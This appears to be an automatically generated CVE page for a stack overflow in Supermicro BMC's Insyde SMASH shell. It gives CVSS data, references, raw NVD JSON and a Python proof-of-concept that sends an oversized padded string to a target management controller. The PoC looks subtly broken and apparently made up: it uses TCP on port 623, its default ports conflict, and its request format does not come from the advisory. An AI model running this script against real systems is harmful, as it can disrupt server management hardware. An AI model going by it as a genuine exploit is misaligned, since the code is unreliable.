CVE-2025-7704

Description

Supermicro BMC Insyde SMASH shell program has a stacked-based overflow vulnerability

CVSS Details

CVSS Score

5.4

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Supermicro BMC 固件（Insyde SMASH shell < 修复版本）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
# CVE-2025-7704 PoC - Supermicro BMC Insyde SMASH shell Stack Overflow
# Target: Supermicro BMC with vulnerable SMASH shell

import socket
import sys

def exploit_smash_shell(target_ip, target_port=623):
    """
    Send malicious payload to trigger stack overflow in SMASH shell
    """
    # IPMI RMCP Port (623) or HTTPS management port
    # This PoC demonstrates the overflow condition
    
    # Payload: Long string to overflow stack buffer
    # Adjust length based on target firmware version
    padding = b'A' * 1000  # Buffer overflow trigger
    
    # SMASH CLP (Command Line Protocol) format
    payload = b'/SMASH/shell/exec?cmd=' + padding + b'\r\n'
    
    try:
        print(f'[*] Connecting to {target_ip}:{target_port}')
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        
        print(f'[*] Sending malicious payload ({len(padding)} bytes)')
        sock.send(payload)
        
        response = sock.recv(4096)
        print(f'[*] Response: {response}')
        sock.close()
        return True
    except Exception as e:
        print(f'[-] Error: {e}')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print(f'Usage: {sys.argv[0]} <target_ip> [port]')
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 443
    exploit_smash_shell(target, port)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-7704
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-7704
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-7704/
[4] VulDB https://vuldb.com/cve/CVE-2025-7704
[5] https://www.supermicro.com/en/support/security_BMC_IPMI_Oct_2025

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-7704", "sourceIdentifier": "def9a96e-e099-41a9-bfac-30fd4f82c411", "published": "2025-11-13T10:15:54.823", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Supermicro BMC  Insyde SMASH shell program has a stacked-based overflow vulnerability"}], "metrics": {"cvssMetricV31": [{"source": "def9a96e-e099-41a9-bfac-30fd4f82c411", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "def9a96e-e099-41a9-bfac-30fd4f82c411", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://www.supermicro.com/en/support/security_BMC_IPMI_Oct_2025", "source": "def9a96e-e099-41a9-bfac-30fd4f82c411"}]}}